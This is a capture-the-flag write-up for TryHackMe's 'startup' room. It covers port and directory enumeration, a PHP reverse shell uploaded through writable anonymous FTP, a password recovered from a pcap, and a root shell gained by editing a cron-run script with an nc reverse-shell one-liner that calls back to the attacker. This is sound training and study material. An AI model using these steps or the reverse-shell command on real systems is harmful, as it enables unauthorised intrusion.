TryHackMe CTF: startup (Easy)

Leverages writable FTP directory to upload and execute a PHP reverse shell. Gains user access through password extraction from a pcap file. Achieves root by exploiting a scheduled script with writable dependencies.
Categories:
Ctf Thm
Tags:
Ctf Nmap Gobuster Dirbuster Session Broken-Authentication Javascript Apache Ubuntu John Ssh2john Linpeas Privesc Cron

URL: https://tryhackme.com/room/startup   Easy

PHASE 1: Reconnaissance

Description of the room:

We are Spice Hut, a new startup company that just made it big! We offer a variety of spices and club sandwiches (in case you get hungry), but that is not why you are here. To be truthful, we aren’t sure if our developers know what they are doing and our security concerns are rising. We ask that you perform a thorough penetration test and try to own root. Good luck!

PHASE 2: Scanning & Enumeration

Running: nmap

Ran the following:

nmap -sC -sV x.x.x.x

Interesting ports found to be open:

PORT   STATE SERVICE REASON
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))

Anonymous FTP has an Among Us meme, and a text file telling people to stop leaving memes on that file share. The ftp folder is writable. That could be something?

Also see: nmap.log

Running: gobuster

Ran the following:

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://x.x.x.x

Interesting folders found:

/files                (Status: 301) [Size: 312] [--> http://10.10.159.60/files/]

Also see: gobuster.log

Running: nikto

Ran the following:

nikto -h x.x.x.x

Nothing interesting found.

Also see: nikto.log

PHASE 3: Gaining Access

Unprivileged Access

Since the anonymous FTP folder /ftp/ is writeable, you can do a put revshell.php into that folder, and then execute that reverse shell from the /files/revshell.php URL in the browser.

That will get you a primitive shell running as the www-data user.

Privilege Escalation (power user)

First, to privesc into the lennie account (you can see their home folder under /home/), look in the incidents folder for a pcap file. If you download that file and view it with Wireshark, you can see there was a password attempt. It was a bad password attempt for www-data, but that IS the password for lennie.

Meaning, you can now do su - lennie with that newly found password. You are now logged-in as lennie.

Privilege Escalation (root)

The Hint from TryHackMe for root privesc is “scripts”. Well, in Lennie’s home folder there is a ~/scripts/ folder. In there is a bash script that calls /etc/print.sh. In short, it looks like something external kicks off that script, but we don’t know what it is.

So, we modify /etc/print.sh to reverse shell back to our workstation by adding something like:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc x.x.x.x 8080 >/tmp/f

and then listen on your workstation with something like this:

nc -lvnp 8080

After a minute or so, you’ve got a prompt, and it’s a root prompt!